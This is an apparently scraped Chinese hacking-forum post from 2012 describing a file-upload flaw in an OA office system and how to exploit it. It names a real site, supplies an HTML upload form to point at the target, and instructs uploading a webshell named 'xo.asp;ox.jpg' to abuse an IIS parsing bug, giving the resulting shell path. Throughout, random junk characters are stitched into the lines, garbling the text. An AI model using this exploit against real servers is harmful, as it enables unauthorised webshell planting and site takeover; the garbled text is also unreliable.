中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞6 i9 w) F. o' @

8 Y6 r& M$ ~6 Z! a  s) D系统介绍:3 v* r! X/ C$ n  l1 C+ x
: `# g, q& ?% r4 G5 e. V
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
4 k( S% J+ Q) \- F: \- f; w
& l2 P0 s5 o4 ]5 N  {& c3 a主要功能:" e! I% ^5 V7 T+ r/ x* P6 _8 W) q
公司通告
0 h% X' A; d. ]工作计划 ( G2 V9 ^/ v/ O9 [6 w
通讯助理 ' P8 T* z, I- H: I/ T6 E2 Q2 [
客户资源
3 v/ v+ b, r* m( m我的公文
) q& h2 x, U% \% ]5 q5 [公文传阅 " r$ S; |7 f5 J0 T) x
公共资源 ( @8 K( L% g( E: N' P( V' {
资源预约
, y, M7 O# Y8 e0 L今日考勤 ( \. |! [/ @8 i& k, A
个人计划 + m5 L  i" y8 e
个人通讯录 , A" B% N% Z' L( H" l, h
个人基本档案 6 Z. H# b$ m- k
未读邮件
' S3 l& k. E2 B' b, N: n+ M发邮件
& j9 e! _4 R% K" w2 K收件夹
0 I1 k6 R* `3 R. E* m寄件夹
7 H; l! Q9 U8 g% ]! D& x9 c网络硬盘 % t; C; q, ^* A) m$ |6 r
网络会议 $ \' b3 Q" g: d
网络调查 4 M. s- }+ ?4 ?, ~. f4 p
交流论坛
; j& P5 f$ k! E: ^2 Z0 T( B+ @8 [) Q9 M' D, a; d) I
有兴趣测试的朋友可以下源码看看& r8 z  t. s. n- t( r

6 Y! \. L+ h9 ^2 K' L8 h5 k源码下载:: n+ K+ k; I2 m9 H9 K' b& B+ j

4 F( ?! k2 U$ ?. R( Ehttp://www.mycodes.net/30/4750.htm
# u1 D* d7 ^" \2 ]& B9 e/ s; a, h9 ^9 R  O
漏洞介绍:0 }( K4 x, J: G( }

# U7 v; I6 K& P由upfile.asp上传文件漏洞引起
, T6 m5 l; C# O* c9 r. Z) j- f: d6 E
测试方法:+ h3 m9 q7 g. E0 }, i
, L# B' ]/ e4 J- q
使用名小子上传http://www.itlynn.com/upfile.asp即可6 q+ U# M$ F5 C
$ r( Y0 W. O: R$ T) N9 _: i9 n
如果upfile.asp文件被删除不存在。/ t; t8 ?& q* n0 D  \) B9 s+ g, ~

; F/ _" M) u1 J: B" r# h, L1 P# }0 U  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
+ j- e7 k7 P4 H3 G7 r- H) I
9 G: ^( E( m5 k; Q# x; y/ m" K5 u5 Q如果存在那么将如下代码保存为upfile.html。8 a/ Y$ O3 }: x8 W) [+ G

8 h1 f4 w* A. p* x. [5 ~$ D5 t然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
4 ~. A$ P% x* ^. e8 X8 w' ~
$ t; M' p! b3 K- p
5 R4 ?& A' U( j' m/ s4 j# @* {+ R! l* H9 G8 t' [, m
01 <table border='0' align="center" cellpadding="5">
- }+ f) O: U! y- F7 k+ [6 x
$ {. K6 f" e  x9 O/ P+ ~02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> % C) S; u" P# b" U
& p7 s  T2 K, J* s
03 <tr>
0 D9 `3 O' K1 i" D' z6 A9 O. C( \8 o
04             <td>报错:</td>
+ Y3 t* ^0 ~: H- d. j* i) `
: T1 d/ s1 m" _: e4 X, k: A/ |* P05             <td><input type='radio' name='errnumber' value='0'>
: m/ j7 Z! w% y2 Q6 B+ v" r0 f3 Z; X, @, o) o! T
06               自动更名
* x: `$ Z- {" Z3 q
9 d. _2 i. O9 N4 o' R07               <input type='radio' name='errnumber' value='1' checked> " h0 l+ U# N# ~4 h5 b7 I. f

. Y7 s3 r3 h+ R4 u$ T+ k. p08               报错方式 # F  t( _& w: p
+ C' a0 `; z; X* K
09               <input type='radio' name='errnumber' value='2'>
. r# V; \" R! Z. l9 L* ]. x. z8 o! j6 p
10               直接覆盖</td> ( ?4 N' ?* O; \3 v6 O
2 _/ i8 O6 o+ f$ E* ~
11           </tr> 3 p% J2 m' q3 h* K

! K; i; N4 q- i2 S1 v( v7 E12           <tr>
7 B" j/ Y3 W2 s. r+ S1 [
0 L: H. Z% s3 m6 S9 a: q13             <td>主题:</td> . p! I, |" l# O* P" r. i
: f3 B" x5 r! C3 s3 X
14             <td><input type='text' name='filename' size='30'></td> 2 `3 Z0 m( }4 z1 d: x

3 K1 q9 M1 H& r- m; J9 L6 s: R15           </tr>
' {7 P) u; f8 I* ], D; F# e1 I, e# s( T  S8 D) w7 L* D
16           <tr>
6 T' u% E8 x0 ^( T
, A- u, r- M# c' u17             <td>文件:</td> 3 [7 a9 ~* `+ {% w) f& W

4 I, n! D2 f/ ^2 h, ~, B18             <td><input type="file"name="fruit"size="30"></td>
0 |; T0 e( o* x4 m9 \! @' h- |0 ~9 |
19           </tr> " X: `- s3 S$ M. F' b) B

5 Q3 H$ K# L9 U7 L! b- v( H20           <tr> , r. A4 y1 n% c) ?) @5 Q* {7 @% e
5 H7 ]. B0 `1 D" k" k7 g7 m) P
21             <td valign='top'>简介:</td> 2 |) a' e& |" q. V6 o$ k' L

) H3 l, A  l( ^) O  J/ H$ L0 r22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> % [4 I' N1 B5 C7 k3 Z

9 e3 k1 T3 U) Z' W& f23           </tr> & P6 u" J+ X4 l1 c4 @' e
$ N4 w5 D" f1 q5 B  u3 K/ A
24   ! l2 @; K/ Z) r' \+ r9 J8 g

7 B4 p! q, k8 I, V* j# k# E9 |25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
7 f  u! N( G6 F2 Z$ r
2 j1 l$ V  d3 m+ i3 K* j26           </tr>
$ A8 `5 b- H# o4 J7 @0 w4 u
5 x# i9 t' M) J( U27         </form> 2 N1 c7 F9 N- ~, s

3 R, _0 B  g/ U0 J然后打开上传一个文件名为xo.asp;ox.jpg的文件。
2 @9 N, K+ J! t) r% U& j0 m! g. x3 q
* E4 _7 }, _& V
& f8 i: B- a7 I, [4 N9 u4 W
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg5 `9 s# [) F( g! B" M. ^* j' h
  O7 Y8 Z0 W: v2 F4 [/ d: u
此漏洞需要配合解析漏洞利用。
6 K% `" |) k/ g. Y/ n+ l. S1 c/ j0 Z4 a  Y# H; t: h  a. K# z





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2